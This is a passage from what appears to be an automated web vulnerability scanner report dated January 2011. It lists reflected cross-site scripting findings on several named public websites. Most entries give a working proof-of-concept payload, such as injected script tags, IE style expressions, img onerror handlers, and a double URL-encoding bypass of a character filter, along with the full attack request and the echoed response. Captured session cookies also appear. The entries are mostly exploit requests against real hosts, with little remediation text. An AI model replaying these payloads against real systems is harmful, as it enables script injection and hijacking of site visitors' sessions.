Content-Length: 4705
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title><
...[SNIP]...
<input type="hidden" name="url" value="http://whitepapers.scmagazineuk.com/content11136773d9"><script>alert(1)</script>c4735f62d83">
...[SNIP]...

1.111. http://whitepapers.scmagazineuk.com/index.php [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /index.php

Issue detail

The value of the limit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e38"><script>alert(1)</script>ea34dcb2694 was submitted in the limit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_categoryreport&task=viewlist&sort=pdate&id=191&limit=89e38"><script>alert(1)</script>ea34dcb2694&limitstart= HTTP/1.1
Host: whitepapers.scmagazineuk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.16.10.1296493450; __qca=P0-1355715055-1296491544254;

Response

HTTP/1.0 200 OK
Date: Mon, 31 Jan 2011 18:15:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 18:15:20 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="author" content="www.madisonlogi
...[SNIP]...
<a href="http://whitepapers.scmagazineuk.com/index.php?option=com_categoryreport&task=viewlist&sort=title&id=191&limit=89e38"><script>alert(1)</script>ea34dcb2694&limitstart=0" rel="nofollow" class="sortLink">
...[SNIP]...

1.112. http://whitepapers.scmagazineuk.com/index.php [sort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /index.php

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5982c"style%3d"x%3aexpression(alert(1))"e1cc1d8eefc was submitted in the sort parameter. This input was echoed as 5982c"style="x:expression(alert(1))"e1cc1d8eefc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /index.php?option=com_categoryreport&task=viewlist&sort=pdate5982c"style%3d"x%3aexpression(alert(1))"e1cc1d8eefc&id=191&limit=&limitstart= HTTP/1.1
Host: whitepapers.scmagazineuk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.16.10.1296493450; __qca=P0-1355715055-1296491544254;

Response

HTTP/1.0 200 OK
Date: Mon, 31 Jan 2011 18:15:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 18:15:11 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="author" content="www.madisonlogi
...[SNIP]...
<a href="http://whitepapers.scmagazineuk.com/index.php?option=com_categoryreport&task=viewlist&n=1&sort=pdate5982c"style="x:expression(alert(1))"e1cc1d8eefc&id=191&amp;limit=25&amp;limitstart=25" class="pagenav">
...[SNIP]...

1.113. http://www.astaro.com/newsletter [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.astaro.com
Path:   /newsletter

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24cb6"><script>alert(1)</script>78300d896e1 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsletter?uid=90d583b---24cb6"><script>alert(1)</script>78300d896e1 HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296493738;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 31 Jan 2011 18:52:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 58989
Date: Mon, 31 Jan 2011 18:52:32 GMT
X-Varnish: 1753030192
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://www.astaro.com/newsletter?uid=5179dac---24cb6"><script>alert(1)</script>78300d896e1">
...[SNIP]...

1.114. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a4b"-alert(1)-"dcd72038d6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:f7a4b"-alert(1)-"dcd72038d6b/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.4074455885.742591488; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:30 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31115
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:f7a4b"-alert(1)-"dcd72038d6b";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:f7a4b\"-alert(1)-\"dcd72038d6b/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

1.115. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90b4c</script><script>alert(1)</script>6bd848177d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com90b4c</script><script>alert(1)</script>6bd848177d1/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.903299917.363268352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:31 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com90b4c</script><script>alert(1)</script>6bd848177d1/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

1.116. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d86</script><script>alert(1)</script>e73cbe4e8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*42d86</script><script>alert(1)</script>e73cbe4e8cc/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240378380.3805758285.1186990336; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:32 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*42d86</script><script>alert(1)</script>e73cbe4e8cc/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.117. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa82</script><script>alert(1)</script>12dd697aac6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.comcfa82</script><script>alert(1)</script>12dd697aac6/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.1482885632; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:33 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.comcfa82</script><script>alert(1)</script>12dd697aac6/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

1.118. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69562</script><script>alert(1)</script>aa30d423751 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video69562</script><script>alert(1)</script>aa30d423751 HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.1600326144; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:35 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video69562</script><script>alert(1)</script>aa30d423751";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.119. http://www.blogtalkradio.com/ajax2.aspx [JSONCallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogtalkradio.com
Path:   /ajax2.aspx

Issue detail

The value of the JSONCallback request parameter is copied into the HTML document as plain text between tags. The payload 3a520<script>alert(1)</script>551eb5a8d72 was submitted in the JSONCallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax2.aspx?arg=onairmenu&ctx=ulOnAir&JSONCallback=jsonp12965078065773a520<script>alert(1)</script>551eb5a8d72&_=1296508130560 HTTP/1.1
Host: www.blogtalkradio.com
Proxy-Connection: keep-alive
Referer: http://www.blogtalkradio.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _initReferrer=_initReferrer=http://www.google.com/search?hl=en&q=8c2cd'-alert(document.cookie)-'2906292c620; BTRAnon=NLm9CRz4ywEkAAAAN2NlZTI4Y2QtOGZhMy00M2MyLWE3YmEtNTM0N2RkMGRkNDg4QM84Vsk86Bgp8UmIoLKhsC2liTk1; ASP.NET_SessionId=gtf1zujuc2e4rvzf2es3q545; BTRListenGUID=da81759c-986d-4b69-a654-53765d67e98d; BTRJSTZOffset=-360; BTRJSDSTOffset=-300; utag_main=_st:1296509630546$ses_id:1296508370635%3Bexp-session; __qca=P0-519510845-1296507831625; __utmz=247705172.1296507833.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=247705172.1156932918.1296507833.1296507833.1296507833.1; __utmc=247705172; __utmb=247705172.1.10.1296507833; __ptca=16192809.KUht51crVzKm.1296529435.1296529435.1296529435.1; __ptcc=1; __ptcs=16192809.1.10.1296529435; __ptcz=16192809.1296529435.1.0.ptmcsr=(direct)|ptmcmd=(none)|ptmccn=(direct)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 31 Jan 2011 21:10:54 GMT
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
Server: WWW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Connection: close

jsonp12965078065773a520<script>alert(1)</script>551eb5a8d72({"success":{"arg":"onairmenu","ctx":"ulOnAir","html":"<li class=\"first\" ><a class=\"sfirst\" href=\"\/freedomizerradio\/2011\/01\/31\/90mi
...[SNIP]...

1.120. http://www.blogtalkradio.com/ajax2.aspx [ctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogtalkradio.com
Path:   /ajax2.aspx

Issue detail

The value of the ctx request parameter is copied into the HTML document as plain text between tags. The payload a0504<img%20src%3da%20onerror%3dalert(1)>fd0e7e7d201 was submitted in the ctx parameter. This input was echoed as a0504<img src=a onerror=alert(1)>fd0e7e7d201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ajax2.aspx?arg=onairmenu&ctx=ulOnAira0504<img%20src%3da%20onerror%3dalert(1)>fd0e7e7d201&JSONCallback=jsonp1296507806577&_=1296508130560 HTTP/1.1
Host: www.blogtalkradio.com
Proxy-Connection: keep-alive
Referer: http://www.blogtalkradio.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _initReferrer=_initReferrer=http://www.google.com/search?hl=en&q=8c2cd'-alert(document.cookie)-'2906292c620; BTRAnon=NLm9CRz4ywEkAAAAN2NlZTI4Y2QtOGZhMy00M2MyLWE3YmEtNTM0N2RkMGRkNDg4QM84Vsk86Bgp8UmIoLKhsC2liTk1; ASP.NET_SessionId=gtf1zujuc2e4rvzf2es3q545; BTRListenGUID=da81759c-986d-4b69-a654-53765d67e98d; BTRJSTZOffset=-360; BTRJSDSTOffset=-300; utag_main=_st:1296509630546$ses_id:1296508370635%3Bexp-session; __qca=P0-519510845-1296507831625; __utmz=247705172.1296507833.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=247705172.1156932918.1296507833.1296507833.1296507833.1; __utmc=247705172; __utmb=247705172.1.10.1296507833; __ptca=16192809.KUht51crVzKm.1296529435.1296529435.1296529435.1; __ptcc=1; __ptcs=16192809.1.10.1296529435; __ptcz=16192809.1296529435.1.0.ptmcsr=(direct)|ptmcmd=(none)|ptmccn=(direct)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 31 Jan 2011 21:10:53 GMT
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
Server: WWW12
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Connection: close

jsonp1296507806577({"success":{"arg":"onairmenu","ctx":"ulOnAira0504<img src=a onerror=alert(1)>fd0e7e7d201","html":"<li class=\"first\" ><a class=\"sfirst\" href=\"\/freedomizerradio\/2011\/01\/31\/9
...[SNIP]...

1.121. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cbc0%253cscript%253ealert%25281%2529%253c%252fscript%253e479a6403fac was submitted in the REST URL parameter 3. This input was echoed as 5cbc0<script>alert(1)</script>479a6403fac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/201101270061925cbc0%253cscript%253ealert%25281%2529%253c%252fscript%253e479a6403fac/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:13:56 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=xv2JNGtJMhzDwryh1n3ytP3lgJPHpjY2gST0sDhHvG0C2jb0Jf1v!1321864744!-1789265175; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 201101270061925cbc0<script>alert(1)</script>479a6403fac and language = en.</span>
...[SNIP]...

1.122. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f984c%253cscript%253ealert%25281%2529%253c%252fscript%253edd66a2a361d was submitted in the REST URL parameter 4. This input was echoed as f984c<script>alert(1)</script>dd66a2a361d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110127006192/enf984c%253cscript%253ealert%25281%2529%253c%252fscript%253edd66a2a361d/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
